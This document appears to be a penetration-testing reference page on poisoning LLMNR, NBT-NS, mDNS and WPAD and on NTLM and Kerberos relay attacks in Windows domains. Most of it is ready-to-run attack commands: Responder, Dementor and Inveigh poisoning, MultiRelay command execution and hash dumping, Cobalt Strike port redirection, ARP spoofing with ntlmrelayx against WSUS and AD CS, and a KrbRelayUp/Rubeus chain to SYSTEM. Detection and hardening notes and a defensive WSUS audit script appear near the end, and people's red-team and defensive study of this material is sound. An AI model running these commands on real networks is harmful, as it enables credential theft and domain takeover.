Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks


Network Protocols

Local Host Resolution Protocols

  • LLMNR, NBT-NS, and mDNS:
    • Microsoft and other operating systems use LLMNR and NBT-NS for local name resolution when DNS fails. Similarly, Apple and Linux systems use mDNS.
    • These protocols can be intercepted and spoofed because of their unauthenticated, broadcast nature over UDP.
    • Responder and Dementor can be used to impersonate services by sending forged responses to hosts querying these protocols.
    • Further information on service impersonation using Responder can be found here.

Web Proxy Auto-Discovery Protocol (WPAD)

  • WPAD allows browsers to discover proxy settings automatically.
  • Discovery is done via DHCP, DNS, or by falling back to LLMNR and NBT-NS if DNS fails.
  • Responder can automate WPAD attacks, directing clients to malicious WPAD servers.

Responder/Dementor for Protocol Poisoning

  • Responder is a tool used to poison LLMNR, NBT-NS, and mDNS queries, answering selectively according to the query type and targeting SMB services in particular.
  • It comes pre-installed in Kali Linux, configurable at /etc/responder/Responder.conf.
  • Responder prints captured hashes on screen and saves them in the /usr/share/responder/logs directory.
  • It supports IPv4 and IPv6.
  • Windows version of Responder is available here.
  • Dementor expands on the topics of multicast poisoning and additionally acts as a rogue service provider (including CUPS RCE support).
  • The overall layout is similar to Responder, with a more detailed configuration (the default is here: Dementor.toml).
  • Compatibility between Dementor and Responder is given here: Compatibility Matrix
  • Intro and Documentation here: Dementor - Docs
  • Fixes capture issues introduced by Responder on certain protocols

Running Responder

  • To run Responder with default settings: responder -I <Interface>
  • For more aggressive probing (with potential side effects): responder -I <Interface> -P -r -v
  • Techniques to capture NTLMv1 challenges/responses for easier cracking: responder -I <Interface> --lm --disable-ess
  • WPAD impersonation can be activated with: responder -I <Interface> --wpad
  • NetBIOS requests can be resolved to the attacker’s IP, and an authentication proxy can be set up: responder.py -I <interface> -Pv

Running Dementor

  • With default settings applied: Dementor -I <interface>
  • With default settings in analysis mode: Dementor -I <interface> -A
  • Automatic NTLM session downgrade (ESS): Dementor -I <interface> -O NTLM.ExtendedSessionSecurity=Off
  • Run current session with custom config: Dementor -I <interface> --config <file.toml>

DHCP Poisoning with Responder

  • Spoofing DHCP responses can permanently poison a victim's routing information, offering a stealthier alternative to ARP poisoning.
  • It requires precise knowledge of the target network's configuration.
  • Running the attack: ./Responder.py -I eth0 -Pdv
  • This method can effectively capture NTLMv1/2 hashes, but it requires careful handling to avoid disrupting the network.

Capturing Credentials with Responder/Dementor

  • Responder/Dementor impersonates services over the protocols mentioned above, capturing credentials (usually an NTLMv2 Challenge/Response) when a user attempts to authenticate against the spoofed services.
  • Attempts can be made to downgrade to NetNTLMv1 or disable ESS for easier credential cracking.

It is important to note that these techniques must be used legally and ethically, with proper authorization, and without causing damage or gaining unauthorized access.

Inveigh

Inveigh is a tool for penetration testers and red teamers, designed for Windows systems. It offers functionality similar to Responder, performing spoofing and man-in-the-middle attacks. The tool has evolved from a PowerShell script into a C# binary, with Inveigh and InveighZero as the main versions. Detailed parameters and instructions are available in the wiki.

Inveigh can be run via PowerShell:

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

Or executed as a C# binary:

Inveigh.exe

NTLM Relay Attack

This attack leverages SMB authentication sessions to gain access to a target machine, yielding a system shell if successful. Key prerequisites include:

  • The authenticating user must have Local Admin access on the relayed host.
  • SMB signing must be disabled.

445 Port Forwarding and Tunneling

In situations where direct insertion into the network is not possible, traffic on port 445 needs to be forwarded and tunneled. Tools like PortBender help redirect port 445 traffic to another port, which is essential when local admin access is available for driver loading.

PortBender setup and operation in Cobalt Strike:

Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop

Other NTLM Relay Attack Tools

  • Metasploit: Configured with proxies, along with local and remote host details.
  • smbrelayx: A Python script for relaying SMB sessions and executing commands or deploying backdoors.
  • MultiRelay: A tool from the Responder suite that can relay specific users or all users, execute commands, or dump hashes.

Each tool can be configured to work through a SOCKS proxy if needed, enabling attacks even with indirect network access.

MultiRelay Operation

MultiRelay is run from the /usr/share/responder/tools directory, targeting specific IPs or users.

python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic

These tools and techniques form a complete set for conducting NTLM Relay attacks in various network environments.

Abusing WSUS HTTP (8530) for NTLM Relay to LDAP/SMB/AD CS (ESC8)

WSUS clients authenticate to their update server using NTLM over HTTP (8530) or HTTPS (8531). When HTTP is enabled, the periodic client check-ins can be coerced or intercepted on the local segment and relayed with ntlmrelayx to LDAP/LDAPS/SMB or AD CS HTTP endpoints (ESC8) without cracking any hashes. This blends in with normal update traffic and often yields machine account (HOST$) authentications.

What to look for

  • GPO/registry configuration under HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate and …\WindowsUpdate\AU:
    • WUServer (e.g., http://wsus.domain.local:8530)
    • WUStatusServer (reporting URL)
    • UseWUServer (1 = WSUS; 0 = Microsoft Update)
    • DetectionFrequencyEnabled and DetectionFrequency (hours)
  • WSUS SOAP endpoints used by clients over HTTP:
    • /ClientWebService/client.asmx (approvals)
    • /ReportingWebService/reportingwebservice.asmx (status)
  • Default ports: 8530/tcp HTTP, 8531/tcp HTTPS
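As an added, defender-side example (not part of the original page), the following Python audits the WSUS client policy values listed above as they appear in `reg query` output and flags the plaintext-HTTP configuration that the relay depends on; the sample registry text, hostname and values are constructed.

```python
"""Audit exported WSUS client policy for cleartext (HTTP/8530) update servers.

Added example, not from the original page. It parses the text that `reg query`
prints for the WindowsUpdate policy keys (a constructed sample is embedded below)
and reports the NTLM-over-HTTP exposure the relay technique above depends on.
"""
import re
from urllib.parse import urlparse

# Constructed sample of `reg query` output; the hostname is a placeholder.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
    WUServer          REG_SZ       http://wsus.domain.local:8530
    WUStatusServer    REG_SZ       http://wsus.domain.local:8530

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
    UseWUServer                  REG_DWORD    0x1
    DetectionFrequencyEnabled    REG_DWORD    0x1
    DetectionFrequency           REG_DWORD    0x16
"""

# One "<name> <type> <data>" value line; key path lines have no leading blanks.
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*\S)\s*$")

def parse_reg_query(text):
    """Map value name -> data; REG_DWORD hex strings become ints."""
    values = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            name, kind, data = m.groups()
            values[name] = int(data, 16) if kind == "REG_DWORD" else data
    return values

def audit_wsus(values):
    """Findings about WSUS check-ins that would go out as NTLM over plain HTTP."""
    findings = []
    if values.get("UseWUServer") != 1:
        return findings  # clients talk to Microsoft Update, no intranet WSUS
    for key in ("WUServer", "WUStatusServer"):
        u = urlparse(values.get(key, ""))
        if u.scheme == "http":
            findings.append(f"{key} uses HTTP ({u.hostname}:{u.port or 80}): NTLM check-ins are relayable")
    hours = values.get("DetectionFrequency")
    if findings and values.get("DetectionFrequencyEnabled") == 1 and hours:
        findings.append(f"detection runs every {hours} h, so each client re-authenticates that often")
    return findings
```

The fix the audit points at is moving WUServer/WUStatusServer to https:// (8531) with a certificate the clients trust.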

Enumeration

  • Unauthenticated
    • Scan for listeners: nmap -sSVC -Pn --open -p 8530,8531 -iL
    • Sniff HTTP WSUS traffic via L2 MITM and log active clients/endpoints with wsusniff.py (HTTP only unless you can make clients trust your TLS cert).
  • Authenticated
    • Parse SYSVOL GPOs for WSUS keys with MANSPIDER + regpol (the wsuspider.sh wrapper summarises WUServer/WUStatusServer/UseWUServer).
    • Query endpoints at scale from hosts (NetExec) or locally:
      nxc smb -u -p -M reg-query -o PATH="HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" KEY="WUServer"
      reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate

End-to-end HTTP relay steps

  1. Position yourself for MITM (same L2 segment) so the client keeps resolving the WSUS server to you (ARP/DNS poisoning, Bettercap, mitm6, etc.). Example with arpspoof: arpspoof -i -t <wsus_client_ip> <wsus_server_ip>

  2. Redirect port 8530 to your relay listener (optional, convenient):
     iptables -t nat -A PREROUTING -p tcp --dport 8530 -j REDIRECT --to-ports 8530
     iptables -t nat -L PREROUTING --line-numbers

  3. Start ntlmrelayx with the HTTP listener (requires Impacket support for the HTTP listener; see the PRs below): ntlmrelayx.py -t ldap:// -smb2support -socks --keep-relaying --http-port 8530

Other common targets:

  • Relay to SMB (if signing is disabled) for exec/dump: -t smb://
  • Relay to LDAPS for directory changes (e.g., RBCD): -t ldaps://
  • Relay to AD CS web enrollment (ESC8) to obtain a certificate and then authenticate via Schannel/PKINIT: ntlmrelayx.py --http-port 8530 -t http:///certsrv/certfnsh.asp --adcs --no-http-server
    For in-depth AD CS abuse paths and tooling, see the AD CS page:

AD CS Domain Escalation

  4. Trigger a client check-in or wait for the schedule. From the client: wuauclt.exe /detectnow, or use the Windows Update UI (Check for updates).

  5. Use the authenticated SOCKS sessions (if -socks) or the direct relay output for post-exploitation (LDAP changes, SMB operations, or AD CS certificate issuance for later authentication).

HTTPS (8531) constraint

  • Passive capture of WSUS over HTTPS cannot succeed unless the clients trust your certificate. Without a trusted certificate or some other way of breaking TLS, the NTLM handshake cannot be captured/relayed from WSUS HTTPS traffic.

Notes

  • WSUS has been announced as deprecated but remains widely used; HTTP (8530) is still common in many environments.
  • Helper tools: wsusniff.py (observe HTTP WSUS check-ins), wsuspider.sh (enumerate WUServer/WUStatusServer from GPOs), NetExec reg-query at scale.
  • Impacket restored HTTP listener support for ntlmrelayx in PR #2034 (originally added in PR #913).

Force NTLM Logins

On Windows you may be able to force privileged accounts to authenticate to arbitrary machines. Read the following page to learn how:

Force NTLM Privileged Authentication

Kerberos Relay attack

A Kerberos relay attack takes an AP-REQ ticket from one service and replays it against a second service that shares the same computer account key (because both SPNs live on the same machine account ending in $). This works even when the SPN service classes differ (e.g. CIFS/ vs LDAP/), because the key that decrypts the ticket is the machine's NT hash, not the SPN string itself, and the SPN string is not part of the signature.

Unlike NTLM relay, the hop is limited to the same host, but if you target a protocol that lets you write to LDAP you can chain into Resource-Based Constrained Delegation (RBCD) or AD CS enrollment and obtain NT AUTHORITY\SYSTEM in a single attack.

For in-depth information on this attack see:

| Token                           | Purpose                                               | Relay relevance                        |
|---------------------------------|-------------------------------------------------------|----------------------------------------|
| TGT / AS-REQ ↔ REP              | Proves the user to the KDC                            | untouched                              |
| Service ticket / TGS-REQ ↔ REP  | Bound to one SPN; encrypted with the SPN owner's key  | interchangeable if SPNs share account  |
| AP-REQ                          | Client sends TGS to the service                       | what we steal & replay                 |

  • Tickets are encrypted with a key derived from the password of the account that owns the SPN.
  • The Authenticator inside the AP-REQ carries a timestamp valid for 5 minutes; reuse within that window is accepted until the service's replay cache sees the duplicate.
  • Windows rarely checks whether the SPN string in the ticket matches the service you targeted, so a ticket for CIFS/HOST normally binds fine on LDAP/HOST.

1. What must be true to relay Kerberos

  1. Shared key: the source and target SPNs are owned by the same computer account (the default on Windows servers).
  2. No channel protection: SMB/LDAP signing off and EPA off for HTTP/LDAPS.
  3. You can intercept or coerce authentication: LLMNR/NBNS poisoning, DNS spoofing, PetitPotam / DFSCoerce RPC, fake AuthIP, rogue DCOM, etc.
  4. The ticket must not already have been used: you win the race before the real packet arrives, or block it completely; otherwise the server's replay cache raises Event 4649.
  5. You need some way to MitM the communication, for instance by being a member of the DNSAdmins group so you can change domain DNS, or by being able to edit the victim's HOSTS file.

Kerberos Relay Steps

  • 3.1 Recon the host
# find servers where HTTP, LDAP or CIFS share the same machine account
Get-ADComputer -Filter * -Properties servicePrincipalName |
Where-Object {$_.servicePrincipalName -match '(HTTP|LDAP|CIFS)'} |
Select Name,servicePrincipalName
  • 3.2 Start the relay listener

KrbRelayUp

# one-click local SYSTEM via RBCD
.\KrbRelayUp.exe relay --spn "ldap/DC01.lab.local" --method rbcd --clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8

KrbRelayUp bundles KrbRelay → LDAP → RBCD → Rubeus → SCM bypass in a single binary.

  • 3.3 Coerce Kerberos auth
# coerce DC to auth over SMB with DFSCoerce
.\dfscoerce.exe --target \\DC01.lab.local --listener 10.0.0.50

DFSCoerce makes the DC send us a Kerberos CIFS/DC01 ticket.

  • 3.4 Relay the AP-REQ

KrbRelay extracts the GSS blob from SMB, re-wraps it inside an LDAP bind, and forwards it to ldap://DC01; authentication succeeds because the same key decrypts it.

  • 3.5 Abuse LDAP ➜ RBCD ➜ SYSTEM
# (auto inside KrbRelayUp) manual for clarity
New-MachineAccount -Name "FAKE01" -Password "P@ss123"
KrbRelay.exe -spn ldap/DC01 -rbcd FAKE01_SID
Rubeus s4u /user:FAKE01$ /rc4:<hash> /impersonateuser:administrator /msdsspn:HOST/DC01 /ptt
SCMUACBypass.exe

You now own NT AUTHORITY\SYSTEM.

Other paths worth knowing

| Vector             | Trick                                                                                          | Why it matters                                      |
|--------------------|------------------------------------------------------------------------------------------------|-----------------------------------------------------|
| AuthIP / IPSec     | A rogue server sends a GSS-ID payload with any SPN; the client builds the AP-REQ straight to you | Works even across subnets; machine creds by default |
| DCOM / MSRPC       | A malicious OXID resolver forces the client to authenticate to any SPN and port                | Pure local priv-esc; bypasses the firewall          |
| AD CS Web Enroll   | Relay the machine ticket to HTTP/CA and get a cert, then PKINIT to forge TGTs                  | Bypasses LDAP signing defenses                      |
| Shadow Credentials | Write msDS-KeyCredentialLink, then PKINIT with the forged key pair                             | No need to add a computer account                   |

Troubleshooting

| Error                | Meaning                               | Fix                                    |
|----------------------|---------------------------------------|----------------------------------------|
| KRB_AP_ERR_MODIFIED  | Ticket key ≠ target key               | Wrong host/SPN                         |
| KRB_AP_ERR_SKEW      | Clock > 5 min offset                  | Sync time or use w32tm                 |
| LDAP bind fails      | Signing enforced                      | Use the AD CS path or disable signing  |
| Event 4649 spam      | Service saw a duplicate Authenticator | Block or race the original packet      |

Detection

  • A spike of Event 4769 for CIFS/, HTTP/, LDAP/ from the same source within seconds.
  • Event 4649 on the service indicates a replay was detected.
  • Kerberos logons from 127.0.0.1 (relay to the local SCM) are highly suspicious; map them with the Sigma rule in the KrbRelayUp docs.
  • Watch for changes to the msDS-AllowedToActOnBehalfOfOtherIdentity or msDS-KeyCredentialLink attributes.

Hardening

  1. Enforce LDAP & SMB signing + EPA on every server.
  2. Split SPNs so HTTP is not on the same account as CIFS/LDAP.
  3. Patch coercion vectors (PetitPotam KB5005413, DFS, AuthIP).
  4. Set ms-DS-MachineAccountQuota = 0 to stop unauthorized computers from joining.
  5. Alert on Event 4649 and unexpected loopback Kerberos logons.
